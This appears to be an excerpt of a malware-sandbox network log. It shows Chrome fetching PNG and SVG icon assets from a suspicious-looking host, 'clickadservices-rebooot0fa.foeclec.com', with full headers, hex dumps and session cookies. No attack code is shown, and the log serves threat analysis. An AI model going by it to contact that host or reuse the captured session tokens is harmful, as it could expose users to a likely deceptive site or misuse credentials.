                                                                                                                                      2024-05-08 18:12:52 UTC1213INData Raw: 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35
                                                                                                                                      Data Ascii: 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15
                                                                                                                                      2024-05-08 18:12:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      62192.168.2.1649784104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1142OUTGET /uv6rIFznx1ttRnsWBQkXMgsteCK16wIxP3EEivS6Lgi834130 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC647INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 231
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="uv6rIFznx1ttRnsWBQkXMgsteCK16wIxP3EEivS6Lgi834130"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pzq7wyepDy%2BIkcHREXER%2BJq1OWSO6PNnG88uE5LrNLhw3XilC4JRvZ7l2VOrX5tz%2FiOCdKQmryHqrnaLzh%2FDpzFc4gXw9CuUMPky%2BMRt2%2FWeRjjtgMo6mARzMrQhOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba31cbc3096-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      63192.168.2.1649785104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1157OUTGET /wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:53 UTC675INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:53 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2Bijneadzr8Cga84r9i5BFMxX%2FhsJq9af9GjlTMPLnRLtf449QO5%2B72boZ8TrkEhF1rdWNEmE8yvX5Mo9q1lTmipvslWJ%2FC%2Bwj%2F4zN0grULr8DC3Fv6n%2FYcIBn8BiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba3de552802-SEA
                                                                                                                                      2024-05-08 18:12:53 UTC694INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                                                                      Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                                                                      2024-05-08 18:12:53 UTC1369INData Raw: 37 36 41 32 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34
                                                                                                                                      Data Ascii: 76A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.64
                                                                                                                                      2024-05-08 18:12:53 UTC849INData Raw: 31 32 34 2d 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d
                                                                                                                                      Data Ascii: 124-.758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-
                                                                                                                                      2024-05-08 18:12:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      64192.168.2.1649786104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1164OUTGET /rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:53 UTC676INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:53 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s79bB98tE2IEYhFgJT11cyZLMyfo0v%2ByIr7U%2BaLxB9HcINKazYrsx26PWXQL8z0P9CH6C5H3%2FwhvihUFSzoFM770UaY9o9dsmyol7CwHHsN7%2FWSNKh8DLcziiUJ9IQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba60b61a381-SEA
                                                                                                                                      2024-05-08 18:12:53 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                                                                      Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                                                                      2024-05-08 18:12:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      65192.168.2.1649787104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1136OUTGET /mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:53 UTC644INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:53 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PbrOqLdydMf6eBIPXEahh4YzOa99iZQPEbGnRSDpgYxt5h5IcQkTuxrNxu64EwQxrizDZHdpY%2BglNIc97RSZlVzqIq7kzmtRYboZjj%2BhY7Vsu2zsRjhGc53igR0FaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba71c8d76d0-SEA
                                                                                                                                      2024-05-08 18:12:53 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                                                                      Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                                                                      2024-05-08 18:12:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      66192.168.2.1649788104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:53 UTC1155OUTGET /opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:54 UTC654INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:54 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 29796
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJ5MKVGPwoHJgqV08KOAJVX3BUL2jACdAJ%2BM6aRfUUtVTaMhcs6qXbmtcQHCOYfQNeVGiA0Yoe22vSYwQLQCVVJ6P3Myx72asKW7sUDaTAcvuFTpbz%2FJQQGH8deTjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6baa8f67a3a1-SEA
